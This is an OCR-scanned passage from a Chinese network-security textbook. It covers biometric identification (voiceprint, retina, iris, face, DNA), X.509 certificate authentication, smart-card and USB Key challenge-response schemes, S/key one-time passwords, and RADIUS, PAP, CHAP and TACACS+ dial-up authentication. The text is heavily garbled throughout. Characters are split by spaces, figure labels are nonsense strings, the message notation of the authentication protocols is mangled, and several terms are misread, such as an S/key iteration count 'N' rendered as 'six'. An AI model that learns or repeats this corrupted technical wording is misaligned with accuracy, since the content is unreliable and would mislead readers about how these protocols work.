人 对 语音 的 识别 能 力 非常 强 ,每 个 人 说 话 的 声音 都 有 自己 的 图 4.35 指纹 图 像 
特点 。 声 纹 鉴定 是 以 人 耳 听 辨 的 声 纹 为 基础 ,不 仅 关注 发 音 人 的 
语音 频谱 等 因素 ,还 充分 挖掘 说 话 人 语音 流 中 的 各 种 特色 性 事件 和 表征 性 特点 ,如 由 方言 背 
景 确定 的 地 域 性 ,发 音 部 位 变化 .语音 频谱 \ 内 容 , 以 及 发 音速 度 和 强度 确定 的 发 音 人 的 年 
龄 ,性 格 , 心 态 等 。 

人 类 声 纹 特征 分 为 三 个 层次 : 

(1) 声 道 声学 层次 。 在 分 析 短 时 信号 的 基础 上 ,抽取 对 通道 .时 间 等 因素 不 敏感 特征 。 

(2) 韵律 特征 层次 。 抽 取 独 立 于 声学 、 声 道 等 因素 的 超 音 段 特 征 , 如 方言 .韵律 和 语 
速 等 。 

(3) 语言 结构 层次 。 通 过 对 语音 信号 的 识别 ,获取 更 加 全 面 和 结构 化 的 语义 信息 。 

采用 数字 信号 处 理 技术 自动 提取 及 决定 语言 信号 中 最 基本 而 有 意义 的 信息 ,同时 也 包 
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括 利用 音律 特征 等 个 人 特征 。 声 纹 识别 系统 如 图 4. 36 所 示 ,主要 包括 两 部 分 : 特征 提取 ， 
选取 唯一 表现 说 话 人 身份 的 有 效 且 可 靠 的 特征 ;模式 匹配 ,对 训练 和 识别 时 的 特征 模式 进行 
相似 性 匹配 。 但 是 ,目前 还 没有 证 实 它 的 唯一 性 。 


一 一] 。 欧 氏 距 离 
失真 测度 | . 似 然 比 测度 
识别 
语音 f 结 
信号 -| 预 处 理 -| 兰芝 下 一 [测度 信 计 |- 判决 全 
输入 1 
, 反 汽 天 失真 注 流 出 。 | 训练 
“民间 全 失真 江波 中 【一 -| 语音 库 ] 这 家 Na 
“端点 检测 。 构 词 规 则 
,噪声 滤波 器 本 .同音 字 判 决 
] ,语法 语义 
.背景 知识 


图 4.36 语音 识别 流程 

4. 视网膜 图 样 识别 技术 

人 的 视网膜 血管 的 图 样 具有 良好 的 个 人 特征 ,如 图 4. 37 所 示 。 如 果 视 网 膜 不 被 损伤 ， 
从 三 岁 起 就 会 终身 不 变 。 用 光学 和 电子 仪器 将 视网膜 血管 图 样 记录 下 来 ,一 个 视网膜 血管 
的 图 样 可 压缩 为 小 于 35 字 节 的 数字 信息 。 可 根据 对 图 样 的 节点 和 分 支 的 检测 结果 进行 分 
类 识别 ,要 求 被 识别 人 要 合作 允许 进行 视网膜 特征 的 采样 。 验 证 效果 相当 好 ,但 成 本 较 高 ， 
只 是 在 军事 或 者 银行 系统 中 被 采用 。 

5. 虹膜 图 样 识别 技术 

虹膜 是 一 种 在 眼睛 中 瞳孔 内 的 织物 状 的 各 色 环 状 物 ,每 个 虹膜 都 包含 一 个 独一无二 的 
基于 水 晶体 、 细 丝 .斑点 . 凹 点 .皱纹 和 条 纹 等 特征 的 结构 。 虹 膜 是 巩膜 的 延长 部 分 ,是 眼球 
角膜 和 晶体 之 间 的 环形 薄膜 ,其 图 样 具有 个 人 特征 ,可 以 提供 比 指纹 更 为 细致 的 信息 ,如 


图 4.38 所 示 。 可 以 在 35~40cm 的 距离 采样 , 比 采 集 视网膜 图 样 要 方便 , 易 为 人 所 接受 。 
存储 一 个 虹膜 图 样 需要 256 个 字 节 ,所 需 的 计算 时 间 为 100ms。 


图 4.37 视网膜 图 4.38 虹膜 


利用 虹膜 终身 不 变性 和 差异 性 的 特点 来 识别 身份 ,可 用 于 安全 入 口 . 接 入 控制 信用卡、 
POSt 和 ATM 等 应 用 系统 中 ,能 有 效 进行 身份 识别 。 和 常用 的 指纹 识别 相 比 ,虹膜 识别 技 
术 操 作 更 简便 ,检验 的 精确 度 也 更 高 。 统 计 表 明 , 到 目前 为 止 ,虹膜 识别 的 错误 率 是 各 种 生 
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物 特征 识别 中 最 低 的 ,并 且 具 有 很 强 的 实用 性 。 

6. 脸型 识别 

面部 脸型 识别 技术 通过 对 面部 特征 和 它们 之 间 的 关系 (眼睛 、 鼻 子 和 嘴 的 位 置 以 及 它们 
之 间 的 相对 位 置 , 如 图 4. 39 所 示 ) 来 进行 识别 。 用 于 捕捉 面部 图 像 的 两 项 技术 为 标准 视频 
和 热 成 像 技术 ,包括 面 像 检测 和 面 像 识别 两 个 技术 环节 。 

面 像 检测 主要 实现 面 像 的 检测 和 定位 ,分 为 三 类 : 

(1) 基于 规则 的 面 像 检测 。 总 结 了 特定 条 件 下 可 用 于 检测 面 像 的 知识 (如 脸型 .肤色 
等 ) ,并 把 这 些 知 识 归 纳 成 指导 面 像 检测 的 规则 。 

(2) 基于 模板 匹配 的 面 像 检测 。 首 先 构造 具有 代表 性 的 面 像 模板 ,通过 相关 匹配 或 其 
他 相似 性 度量 检测 面 像 。 

(3) 基于 统计 学 习 的 面 像 检测 。 主 要 利用 面部 特征 点 结构 灰 度 分 布 的 共同 性 。 

面 像 识别 由 两 个 过 程 组 成 。 提 取 面 像 特 征 、 形 成 面 像 特 征 库 和 面 像样 本 训练 。 识 别 是 
用 训练 好 的 分 类 器 将 待 识别 面 像 的 特征 同 特征 库 进 行 匹配 ,输出 识别 结果 。 

人 脸 识别 系统 因 识别 方 式 友 好 、 可 隐蔽 而 备 受 学 术 界 和 工业 界 关注 ,在 金融 .证 券 . 社 
保 ` 公 安 .军队 及 其 他 需要 安全 认证 的 行业 和 部 门 有 着 广泛 的 应 用 。 但 人 脸 识别 不 是 万 能 
的 ,出 现 差错 的 几率 比较 大 。 

7. DNA 基因 识别 技术 

DNA( 脱 氧 核糖 核酸 ) 存 在 于 一 切 有 核 的 动 ( 植 ) 物 中 ,生物 的 全 部 遗传 信息 都 储存 在 
DNA 分 子 里 。DNA 识别 是 利用 不 同 的 人 体 细 胞 中 具有 不 同 的 DNA 分 子 结构 这 一 特征 ， 
如 图 4.40 所 示 。 人 体内 的 DNA 在 整个 人 类 范围 内 具有 唯一 性 和 永久 性 。 因 此 ,除了 对 双 
胞 胎 个 体 的 鉴别 可 能 失去 它 应 有 的 功能 外 ,这 种 方法 具有 绝对 的 权威 性 和 准确 性 。 这 种 方 
法 的 准确 性 优 于 其 他 任何 生物 特征 识别 方法 , 它 广 泛 应 用 于 识别 罪犯 ,亲缘 鉴别 等 。 


图 4.39 人 脸 识别 图 4.40 DNA 


4.5.7 认证 的 数字 证 书 机 制 


数字 证 书 是 一 种 检验 用 户 身份 的 电子 文件 ,也 是 企业 现在 可 以 使 用 的 一 种 工具 。 这 种 
证 书 可 以 授权 购买 ,提供 更 强 的 访问 控制 ,并 具有 很 高 的 安全 性 和 可 靠 性 。 它 是 由 一 个 第 三 
方 证 书 授权 中 心 (Certificate Authority,CA) 发 行 的 ,经 CA 数字 签名 的 包含 用 户 的 公 钥 和 
与 用 户 身份 相关 的 信息 ,是 一 个 实体 在 网 上 信息 交流 及 商务 交易 活动 中 的 身份 证 明 , 具 有 唯 
一 性 。 在 基于 证 书 的 安全 通信 中 ,数字 证 书 是 证 明 用 户 合法 身份 和 提供 用 户 合法 公 钥 的 凭 
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证 ,是 建立 保密 通信 的 基础 。 

通常 使 用 的 是 符合 X. 509 的 数字 证 书 。 它 包含 以 下 一 些 内容 : 证 书 的 版 本 信息 ;证 书 
的 序列 号 ,每 个 证 书 都 有 一 个 唯一 的 证 书 序列 号 :证书 所 使 用 的 签名 算法 ;证 书 的 发 行 机 构 
名 称 ; 证 书 的 有 效 期 ;证 书 所 有 者 的 名 称 ; 证 书 所 有 者 的 公开 密 钥 ; 证 书 发 行者 对 证 书 的 
签名 。 

非 对 称 体制 身份 识别 的 关键 是 将 用 户 身份 与 密 钥 绑 定 。CA 通过 为 用 户 发 放 数字 证 书 
(Certificate) 来 证 明 用 户 公 钥 与 用 户 身份 的 对 应 关系 。 验 证 者 向 用 户 提供 一 随机 数 ;用 户 以 
其 私 钥 SK 对 随机 数 进 行 签 名 ,将 签名 和 自己 的 证 书 提交 给 验证 方 ;验证 者 验证 有 效 性 时 从 
证 书 中 获得 用 户 公 钥 PK ,以 PK 验证 用 户 签名 的 随机 数 。 

X. 509 认证 过 程 假设 通信 双方 都 知道 对 方 的 公 钥 ,或 者 双方 都 从 目录 服务 器 获得 对 方 
的 公 钥 证 书 ,认证 机 制 有 单 向 ,双向 和 三 向 三 种 。 

1. 单 向 身份 认证 

用 户 A 将 消息 发 往 B, 向 B 证 明 : A 的 身份 ,消息 是 由 A 产生 的 ;消息 的 意欲 接收 者 是 
B; 消 息 的 完整 性 和 新 鲜 性 ,如 图 4. 41 所 示 。 


IDAEs\(TAIRANDall Eva( Kan)) -| 


图 4.41 证 书 的 单 向 认证 


图 4.42 中 IDs、IDs 表示 A、B 的 身份 标识 ;Ess 是 用 A 的 私 钥 加 密 ;Ers 是 用 B 的 公 铀 
加 密 ;Ts 是 A 产生 消息 的 时 惟 , 包 括 产生 时 间 ,截止 时 间 ,Rs 是 A 产生 的 不 会 重复 的 随机 
数 ,防止 重 放 、 伪 造 ,B 在 收 到 的 消息 截止 时 间 内 要 一 直 保 存 Ra ;Kas 是 双方 要 建立 的 会 话 
密 钥 。 


IDallEsa(TallRAI/DBllEpa( KaB) 


ESe(TBlIRelIRAIIDAIIEPA(KbA) 
图 4.42 证 书 的 双向 认证 


B 需要 验证 : A 证 书 的 有 效 性 、A 的 签名 消息 完整 性 .接收 者 是 否 为 B,. 时 戳 是 否 是 当 
前 时 间 .RA 有 无 重复 等 。 

2. 证 书 的 双向 身份 认证 

如 图 4. 42 所 示 , 在 单 向 认证 基础 上 ,B 向 A 做 出 应 答 , 以 证 明 : B 的 身份 ,应答 是 了 B 产 
生 的 ;应 答 的 意欲 接收 者 是 A; 应 答 消 息 是 完整 的 和 新 鲜 的 。 

应 答 消 息 包 含 由 A 发 来 的 一 次 性 随机 数 RA ,以 使 应 答 消 息 有 效 ;Ts .Ra 是 B 的 时 戳 和 
随机 数 ;Ksa 是 双方 的 会 话 密 钥 。 

3. 证 书 的 三 向 身份 认证 

在 双向 认证 基础 上 ,A 再 向 B 做 出 应 答 , 即 构成 三 向 身份 认证 。 三 向 身份 认证 的 目的 
是 将 收 到 的 对 方 发 来 的 一 次 性 随机 数 又 返回 给 对 方 , 因 此 双方 不 需要 检查 时 截 , 只 要 检查 对 
方 的 一 次 性 随机 数 即 可 判断 出 重 放 攻击 。 在 通信 双方 无 法 建立 时 钟 同步 时 就 要 用 此 方法 ， 
如 图 4.43 所 示 。 
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LDAIIESA(CTAIIRAIIDB||Epa(KAB) 


Ese(TellRBllRalIDallEpa(Kea)) 


Esa(RelllDs) 
图 4.43 证 书 的 三 向 认证 


4.5.8 认证 的 智能 卡 机 制 


由 于 智能 卡 具 有 安全 存储 和 处 理 能 力 ,因此 智能 卡 在 个 人 身份 识别 方面 有 着 得 天 独 厚 
的 优势 。 智 能 卡 的 应 用 遍及 所 有 生活 和 工作 领域 ,主要 应 用 领域 有 电信 、 交 通 (射频 牌照 )、 
智能 小 区 ,校园 一 卡通 、 公 用 事业 、 公 安 (二 代 身 份 证 ) ,社会 保险 和 金融 等 。 

1. 智能 卡 的 鉴别 与 核实 

智能 卡 鉴别 是 指 对 智能 卡 ( 或 者 是 读 写 设备 ) 的 合法 性 的 验证 , 即 是 如 何 判定 一 张 智 能 
卡 ( 或 读 写 设备 ) 不 是 伪造 的 卡 (或 读 写 设备 ) 的 问题 。 智 能 卡 核实 (Verify) 是 指 对 智能 卡 的 
持 有 者 的 授权 合法 性 验证 。 智 能 卡 的 工作 流程 如 图 4. 44 所 示 。 


卡 与 PC 进行 信 
息 交换 的 桥梁 
IC 卡 的 能 量 来 源 
卡 谈 写 器 | | ”终端 PC Re 
便 朱 式 信息 载体 ， 系统 的 核心 ， 完 成 
记录 有 扫 9 特 和 控 管理 全 
代码 、 文件 资料 的 管理 服务 /管理 申 必 


图 4.44 智能 卡 工作 流程 


读 写 器 鉴别 IC 卡 的 真 伪 (内 部 认证 ?过 程 是 : 读 写 器 生成 随机 数 N ,并 向 卡 发 内 部 认证 
指令 (Internal Authentication), 将 随机 数 送 卡 ; 卡 对 随机 数 N 加 密 成 密 文 M( 密 钥 已 存在 
于 卡 和 读 写 器 中 ) ,并 将 M 送 读 写 器 ; 读 写 器 将 M 解密 成 明文 N, ; 读 写 器 将 明文 N; 和 原 随 
机 数 N 比较 ,相同 则 读 写 器 认为 卡 是 真 的 ,如 图 4.45 所 示 。 

IC 卡 鉴别 读 写 器 的 真 伪 ( 外 部 认证 ?过 程 是 : 读 写 器 向 卡 发 生成 随机 数 命令 , 卡 产生 随 
机 数 N ,并 送 读 写 器 ; 读 写 器 将 随机 数 加 密 成 密 文 M( 密 钥 已 存在 于 卡 和 读 写 器 中 ); 读 写 器 
向 卡 发 外 部 认证 命令 (External Authentication) ,并 将 密 文 M 送 卡 ; 卡 将 密 文 M 解密 成 明 
文 Ni ,并 将 明文 N! 和 原 随 机 数 N 比较 ,相同 则 卡 认 为 读 写 器 是 真 的 ,如 图 4. 46 所 示 。 

核实 卡 的 持 有 者 方法 有 验证 个 人 识别 号 PIN .生物 特征 .下 意识 特征 等 。 安 全 报 文 传送 
采用 报 文 和 加 密 /解密 鉴别 ,提供 完整 性 和 保密 性 保证 。 

2. 智能 卡 的 身份 认证 

在 基于 Web 的 电子 商务 应 用 中 ,用户 进行 商务 交易 前 ,服务 器 首先 使 用 智能 卡 完成 用 
户 身份 的 认证 。 
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读 写 器 IC 卡 读 写 器 | IC 卡 
生成 随机 数 M |] | 
发 "内 部 | 1 | MEKN 1 
认证 "指令 “| 窗 | | 
1 
| ME | | 
1 1 加 密 | 
NF=DkA) | 1 N=DkMI 
解密 | | | 解密 
1 1 
| 发 "外 部 | | 
百 -一 va 认证 中 令 | | NN a 
1 
1 | 
IC 卡 为 候 | 和 于。 该 器 为 介 
| 
IC 卡 为 真 1 | 读 写 器 为 丰 
图 4.45 智能 卡 内 部 认证 图 4.46 智能 卡 外 部 认证 


身份 认证 过 程 中 为 了 产生 变动 的 密码 ,一般 采用 双 运 算 因 子 的 计算 方式 ,也 就 是 加 密 算 
法 的 输入 值 有 两 个 数值 ,其 一 为 用 户 密 钥 ; 另 一 个 为 变动 因子 ,由 于 用 户 密 钥 为 固定 数值 , 因 
此 变动 因子 必须 不 断 变动 才 可 以 算出 不 断 变动 的 动态 密码 。 服 务 器 及 智能 卡 必须 随时 保持 
相同 的 变动 因子 ,才能 算出 相同 的 动态 密码 。 

1) 挑战 响应 认证 

变动 因子 是 由 服务 器 产生 的 随机 数字 。 挑 战 验证 认证 卡 如 图 4. 47 所 示 , 认 证 过 程 
如 下 : 

服务 器 认证 卡 
私有 密 钥 Challenge=Challenge 私有 密 钥 


动态 密码 = 动态 密码 
图 4.47 基于 挑战 验证 认证 卡 


(1) 登录 请 求 。 客 户 端 首先 向 服务 器 发 出 登录 请 求 ,服务 器 提示 用 户 输入 用 户 ID 
和 PIN。 

(2) 询问 。 服 务 器 提供 一 个 随机 串 X(Challenge) 给 插 在 客户 端的 智能 卡 作 为 验证 算法 
的 输入 ,然后 根据 用 户 ID 取出 对 应 的 密 钥 K 后 ,利用 发 送 给 客户 端的 随机 串 X ,在 服务 器 
上 用 加 密 引 擎 进行 运算 ,得 到 运算 结果 RS。 

(3) 应 答 。 智 能 卡 根据 X 与 内 在 密 钥 K 使 用 硬件 加 密 引 擎 运算 ,也 得 到 一 个 运算 结果 
RC ,并 发 送 给 服务 器 。 

(4) 验证 。 比 较 RS 和 RC 便 可 确定 用 户 的 合法 性 。 

由 于 密 钥 存在 于 智能 卡 中 ,运算 过 程 也 是 在 智能 卡 中 完成 , 密 钥 认证 是 通过 加 密 算法 来 
实现 的 ,每 次 产生 的 随机 串 询问 客户 保护 了 传输 的 数据 , 极 大 地 提高 了 安全 性 。 
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2) 时 间 同 步 认 证 

变动 因子 使 用 服务 器 端 与 客户 端的 同步 时 间 值 。 与 挑战 响应 认证 相 比 ,过 程 中 的 随机 
串 用 服务 器 和 客户 端的 同步 时 间 工 蔡 代 ,来 分 别 计算 服务 器 的 动态 密码 RS 和 智能 卡 的 动 
态 密码 RC ,传送 给 服务 器 后 比较 RS 与 RC ,如 果 相 同 则 用 户 合法 。 

时 间 同 步 认 证 卡 在 一 个 固定 期 间 中 (通常 是 一 分 钟 ) 产 生 同 一 个 动态 密码 ,依据 时 间 的 
流逝 产生 不 同 的 密码 。 其 优点 是 易于 使 用 。 缺 点 是 时 间 同 步 困难 ,可 能 造成 必须 重新 输入 
新 密码 。 另 外 ,软体 认证 卡 采 用 PC 的 时 刻 , 很 可 能 随时 被 修改 ,常常 需要 与 服务 器 重新 对 
时 。 不 如 Challenge/Response 认证 更 安全 。 

3) 事件 同步 认证 

事件 同步 认证 依据 认证 卡 上 的 私有 密 钥 产生 一 系列 的 动态 密码 ,如 果 使 用 者 意外 多 产 
生 了 几 组 密码 造成 不 同步 的 状态 ,服务 器 会 自动 重新 同步 到 目前 使 用 的 密码 ,一 旦 一 个 密码 
被 使 用 过 后 ,在 密码 序列 中 所 有 这 个 密码 之 前 的 密码 都 会 失效 。 也 可 以 看 成 将 事件 序列 代 
替 随机 串 的 挑战 响应 认证 。 

事件 同步 认证 的 优点 也 是 容易 使 用 ,由 于 使 用 者 无 法 知道 序列 数字 ,所 以 安全 性 高 , 序 
列 号 码 绝 不 会 显示 出 来 。 缺 点 是 如 果 没 有 PIN 号 码 的 保护 及 认证 卡 借 给 别人 使 用 时 ,会 
在 安全 隐患 。 

3. USB Key 

USB Key 是 一 种 广泛 应 用 的 USB 接口 硬件 设备 , 形 如 普通 的 U 盘 , 其 数据 处 理 和 安全 
性 的 核心 是 内 置 的 智能 卡 芯片 CCPU 卡 )。USB Key 是 USB 接口 和 智能 卡 技术 相 结合 的 新 
一 代数 据 安全 产品 ,可 以 存储 用 户 的 私 钥 以 及 数字 证 书 等 信息 ,利用 USB Key 内 置 的 公 钥 
算法 可 以 实现 对 用 户 身 份 的 认证 。 目 前 USB Key 被 广泛 应 用 于 国内 的 网 上 银行 领域 (如 U 
盾 )。 与 一 般 的 智能 卡 相 比 ,USB Key 最 大 的 优点 是 无 须 单独 的 读 卡 设备 ,其 本 身 便 是 读 卡 
设备 和 CPU 卡 的 合 一 ,因此 使 用 起 来 非常 方便 。 

USB Key 的 特点 ; USB Key 的 硬件 和 PIN 码 构成 了 可 以 使 用 USB Key 的 双 因 素 认 
证 ;敏感 信息 存储 在 USB Key 的 安全 介质 之 中 ,外 部 用 户 无 法 直接 读 取 或 从 USB Key 接口 
的 外 面 读 出 ,修改 、 更 新 和 删除 ,对 密 钥 文 件 的 读 写 和 修改 都 必须 由 USB Key 内 的 程序 调 
用 ;内 置 芯片 硬件 实现 常规 加 密 算 法 (如 DES.3DES) . 公 钥 加 密 算法 (如 RSA)、 数 字 签 名 算 
法 (如 DSA) 、 散 列 函 数 ( 如 SHA-1) 和 各 种 密码 协议 的 客户 端 部 分 ,运算 时 仅 在 USB Key 内 
部 进行 ,保证 了 算法 密 钥 和 中 间 结 果 不 会 出 现在 普通 计算 机 的 内 存 中 ;USB Key 和 主机 之 
间 通 过 USB 接口 进行 的 数据 传输 可 以 被 加 密 , 有 效 防 止 攻击 者 对 敏感 数据 的 截获 ;常常 和 
PKI 体系 相 结 合 ,用 来 保存 用 户 的 数字 证 书 和 私 钥 ,其 开发 接口 为 符合 PKI 标准 的 编程 接 
口 ,如 PKCS#11 或 Microsoft Crypto API。 


4.6 实用 的 认证 系统 


目前 实用 的 认证 方式 有 S/key、Kerberos 和 Radius。S/key 防止 窍 听 和 窃取 ,但 实现 有 
困难 ;Kerberos 和 Radius 认证 方式 都 是 在 服务 器 和 客户 端 都 支持 相应 的 认证 方式 的 条 件 
下 才能 使 用 ,因而 需要 复杂 的 设置 。 
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4.6.1 一 次 性 动态 口令 认证 


口令 认证 机 制 存在 更 新 、 记 忆 等 棘 端 ,实际 使 用 的 口令 并 非 均 匀 随 机 地 分 布 在 可 能 的 密 
钥 空 间 。 多 数 人 出 于 方便 的 考虑 ,类 似 于 A6KX853H 这 样 随机 ,安全 的 密码 总 是 很 难 进入 
到 人 们 的 数字 生活 中 。 

假设 非法 者 能 够 获得 口令 数据 库 , 虽 然 口令 数据 库存 储 的 是 口令 的 Hash 值 , 不 能 够 逆 
向 计算 求 得 ,但 是 攻击 者 完全 可 以 利用 现 有 的 口令 字典 计算 口令 的 Hash 值 ,然后 与 数据 库 
中 的 Hash 值 比较 ,从 而 找到 合适 的 匹配 值 。 

常 采用 在 口令 的 后 面 添加 随机 字符 串 ( 称 为 salt) 产 生 Hash 值 的 办 法 来 抵抗 字典 式 攻 
击 。 如 果 随 机 数字 salt 的 取 值 符合 一 定 要 求 , 比 如 随机 性 能 .长 度 等 ,能 在 一 定 程度 上 限制 
字典 式 攻 击 。 

口令 管理 需要 付出 一 定 的 安全 代价 。 多 数 服务 器 只 是 存放 用 户 ID 和 口令 特征 的 静态 
认证 列表 进行 认证 。 这 种 方式 配置 简洁 方便 ,但 破解 者 获得 口令 列表 的 代价 较 小 。 采 用 专 
用 密 钥 服务 器 来 管理 口令 ,如 ISP 服务 商 通常 会 将 远程 访问 服务 器 的 共享 认证 列表 放 在 较 
为 安全 的 服务 器 ,达到 使 用 外 部 认证 或 共享 认证 。 这 种 方式 只 需 考 虑 一 台 服 务 器 的 安全 配 
置 ,配置 更 方便 ,认证 更 安全 。 因 此 产生 了 专用 的 认证 服务 器 ,如 Kerberos 认证 服务 。 认 证 
服务 器 对 用 户 进行 认证 时 会 对 整个 认证 过 程 加 密 ,从 而 避免 Hacker 截取 用 户 的 ID 与 
辐 令 。 

1. S/key 认证 方式 

通过 监听 TCP/IP 网 络 中 的 信息 ,可 以 获得 用 户 登 录用 的 账号 和 口令 ,被 截获 的 用 户 账 
号 和 口令 有 助 于 发 动 对 系统 的 攻击 。S/key 是 一 个 一 次 性 口令 系统 ,可 以 用 来 对 付 这 种 类 
型 的 攻击 行为 。 使 用 S/key 系统 时 ,网 络 中 传送 的 账户 和 口令 只 使 用 一 次 后 就 销毁 。 用 户 
使 用 的 源 口 令 永远 也 不 会 在 网 络 上 传输 ,包括 登录 时 或 其 他 需要 口令 的 情形 ,这 样 就 可 以 保 
护 用 户 的 账户 和 口令 不 会 因此 而 被 窃取 。SVkey 系统 的 机 制 保护 的 是 进行 身份 鉴别 时 的 安 
全 性 ,并 不 保证 信息 在 传送 过 程 中 的 保密 性 和 完整 性 。 

S/key 系统 有 两 方面 的 操作 : 在 客户 方 ,必须 有 方法 产生 正确 的 一 次 性 口令 ;在 服务 主 
机 方 ,必须 能 够 验证 该 一 次 性 口令 的 有 效 性 ,并 能 够 让 用 户 安全 地 修改 源 口令 。 

一 般 的 S/key 系统 是 基于 一 些 不 可 逆 算 法 的 (如 MD4 和 MD5) ,由 源 数 据 正 向 计算 出 
结果 速度 很 快 ,但 由 结果 试图 反 向 计算 出 源 数 据 则 基本 上 是 不 可 能 的 。 

2. S/key 一 次 性 口令 的 认证 过 程 

S/key 系统 服务 器 端 对 用 户口 令 进行 初始 化 ,服务 器 将 该 源 口令 按照 选 定 的 算法 计算 
六 次 的 结果 保存 。 用 户 连接 时 客户 端 用 同样 的 算法 计算 N 一 1 次 后 形成 本 次 口令 ,并 传送 
给 服务 器 端 计算 机 认证 。 服 务 器 端 计算 机 将 获得 的 口令 通过 该 算法 计算 一 次 ,并 将 结果 与 
计算 机 保存 的 上 一 个 结果 比较 , 若 相 同 , 则 身份 验证 通过 ,而且 将 本 次 用 户 的 输入 保留 ,作为 
下 一 次 用 于 比较 的 值 。 用 户 在 下 一 次 计算 口令 时 ,客户 端 自动 将 计算 次 数 减 1, 依 此 类 推 ， 
如 图 4. 48 所 示 。 

S/key 有 两 个 重要 数据 。 一 个 是 以 seed 或 key 取 名 ,包含 两 个 字母 和 5 个 数字 ; 另 一 个 
叫 作 iteration count, 在 1~100 之 间 。S/key 通过 连接 “种 子 (Seed)” 和 秘密 密码 来 生成 一 
次 性 口令 ,然后 通过 反复 计算 多 次 应 用 MD4 哈 希 ,再 把 结果 变 成 6 个 英文 字母 的 一 次 性 密 
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连接 请 求 ， 初 始 化 
应 答 (Seed, N-1) 
把 (秘密 口令 +Seed) 进 行 N-1 
用 户 端 次 Hash 计 算 ， 产生 一 次 性 口令 | 和 
将 收 到 的 口令 进行 一 次 Hash 计 算 ， 并 


与 前 次 存储 的 口令 比较 ， 相 等 则 认证 成 
功 ， 并 将 口令 覆盖 存储 ， 否 则 认证 失败 


一 


图 4.48 S/key 系统 工作 原理 


码 。 如 果 用 户 提供 的 密码 的 Hash 值 与 先前 密码 的 一 致 , 则 通过 了 认证 ;服务 器 登录 程序 计 
算 的 次 数 减少 1。 当 反复 计算 的 count 降 到 1 时 ,S/key 必须 被 重新 初始 化 。 

S/key 系统 中 有 4 个 程序 。 密 码 生成 程序 接收 一 个 反复 计算 数 、 一 个 种 子 和 一 个 秘密 
密码 ,然后 产生 一 个 一 次 性 密码 。Keyinit 程序 被 用 来 初始 化 S/key, 改 变 源 密码 、 反 复 计算 
数 和 种 子 。Keyinfo 程序 会 检查 文件 ,打印 被 调用 的 当前 反复 计算 数 和 种 子 。login 和 su 程 
序 包含 了 用 于 认证 S/key 一 次 性 密码 的 必需 的 逻辑 性 。 

S/key 系统 的 优点 是 实现 原理 简单 ;监听 者 也 无 法 从 所 监听 到 的 口令 中 得 到 用 户 的 源 
口令 ,同时 监听 到 的 信息 也 不 能 作为 登录 用 信息 ;在 计算 机 内 部 也 不 保存 用 户 的 源 口令 ,使 
口令 的 安全 性 进一步 得 到 保证 。 缺 点 是 使 用 有 点 麻烦 ,如 源 口 令 使 用 一 定 次 数 后 就 需 重新 
初始 化 ;依赖 于 某 种 算法 的 不 可 逆 性 ,但 算法 不 可 逆 可 能 无 法 长 期 保持 。 


4.6.2 RADIUS 拨号 认证 


RADIUSCRemote Address Dial-In User Service) 是 基于 UDP 的 访问 服务 器 认证 和 记 
账 的 客户 端 / 服 务 器 型 协议 ,在 拨号 网 络 中 提供 注册 、 验 证 功能 。RADIUS 由 朗讯 公司 提 
出 ,已 成 为 Internet 的 正式 协议 标准 ,是 当前 流行 的 AAA(Authentication、 Authorization、 
Accounting, 认证 ,授权 和 计 费 ) 协 议 。 

RADIUS 协议 用 于 网 络 接 入 服务 器 (NAS) 和 后 台 服 务 器 (RADIUS 服务 器 ,有 DB) 之 
间 ,使 得 拨号 和 认证 放 在 两 个 分 离 网 络 设备 上 。 

在 拨号 环境 中 ,要 进行 两 部 分 的 认证 : 首先 是 用 户 的 调制 解 调 器 和 网 络 访问 服务 器 
(NAS) 之 间 使 用 PPP 认证 协议 认证 ,这 类 认证 协议 包括 PAP.CHAP 等 ;然后 NAS 和 认证 
服务 器 进行 认证 ,这 类 协议 包括 TACACS 十 .RADIUS 等 ,如 图 4. 49 所 示 。 


网 络 访问 服务 器 认证 服务 器 


PPP 协 议 


TCP/IP 协 议 
1 广 | 一 | 


人 /| 炮 
调制 解 调 器 
认证 协议 : PAP/CHAP TACACS+/RADIUS 
图 4.49 RADIUS 认证 协议 图 
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PPP(Point to Point Protocol) 是 点 对 点 链 路 上 的 标准 化 Internet IP 封装 。 口 令 认 证 协 
议 (Password Authentication Protocol，PAP) 结 构 简 单 ,使 对 等 实体 通过 双向 握手 进行 认 
证 ;质询 -握手 协议 (Challenge-Handshake Authentication Protocol，CHAP) 使 用 三 次 握手 
的 方式 ,周期 性 地 认证 被 认证 者 的 身份 。 一 旦 连接 建立 起 来 ,就 执行 协议 ,并 且 可 以 在 任意 
时 刻 重复 执行 。 

TACACS 协议 是 一 种 基于 UDP 的 协议 ,被 Cisco 多 次 扩展 。TACACS 十 是 基于 TCP 
的 TACACS 最 新 版 本 ,是 客户 端 / 服 务 器 型 协议 ,TACACS 十 客户 端 通常 是 一 个 NAS ,而 
TACACS 十 服务 器 是 一 个 监控 程序 ,监听 49 号 端口 。TACACS 十 的 基本 设计 组 件 有 认证 、 
授权 和 记 账 。 

RADIUS 认证 结构 如 图 4. 50 所 示 , 其 中 PSDN 为 分 组 交换 网 , NAS 为 网 络 访问 服务 
器 ,AAA 为 认证 ,授权 与 计 费 服务 器 。 


户 Modem 


Nasd 


Hub 


图 4.50 RADIUS 认证 结构 图 


RADIUS 的 认证 过 程 : 接 入 服务 器 从 用 户 获 取 用 户 名 和 口令 (PAP 口令 或 CHAP 加 密 
口令 ), 将 其 同 用 户 的 一 些 其 他 信息 (如 主 叫 号 码 、 接 入 号 码 和 占用 端口 等 ) 封 装 成 RADIUS 
数据 包 向 RADIUS 服务 器 发 送 ,通常 称 为 认证 请 求 包 。RADIUS 服务 器 收 到 认证 请 求 包 
后 ,首先 查看 接 人 服务 器 是 否 已 经 登记 ,然后 根据 包 中 用 户 名 ` 口 令 等 信息 验证 用 户 是 否 合 
法 。 如 果 用 户 非法 ,向 接 入 服务 器 发 访问 拒绝 包 ; 如 果 用 户 合法 ,RADIUS 服务 器 会 将 用 户 
的 配置 信息 (如 用 户 类 型 .IP 地址 等 ) 打 包 发 送 到 接 人 服务 器 ,该 包 被 称 为 访问 接受 包 。 接 
入 服务 器 收 到 访问 接受 /拒绝 包 时 ,首先 要 判断 包 中 的 签名 是 否 正确 ,如 果 不 正确 将 认为 收 
到 一 个 非法 的 包 ; 如 果 签 名 正确 ,那么 接 入 服务 器 或 者 接受 用 户 的 上 网 请 求 , 并 用 收 到 的 信 
息 对 用 户 进行 配置 .授权 ( 收 到 了 访问 接受 包 ) ,或 者 是 拒绝 该 用 户 的 上 网 请 求 ( 收 到 了 访问 
拒绝 包 ) 。 

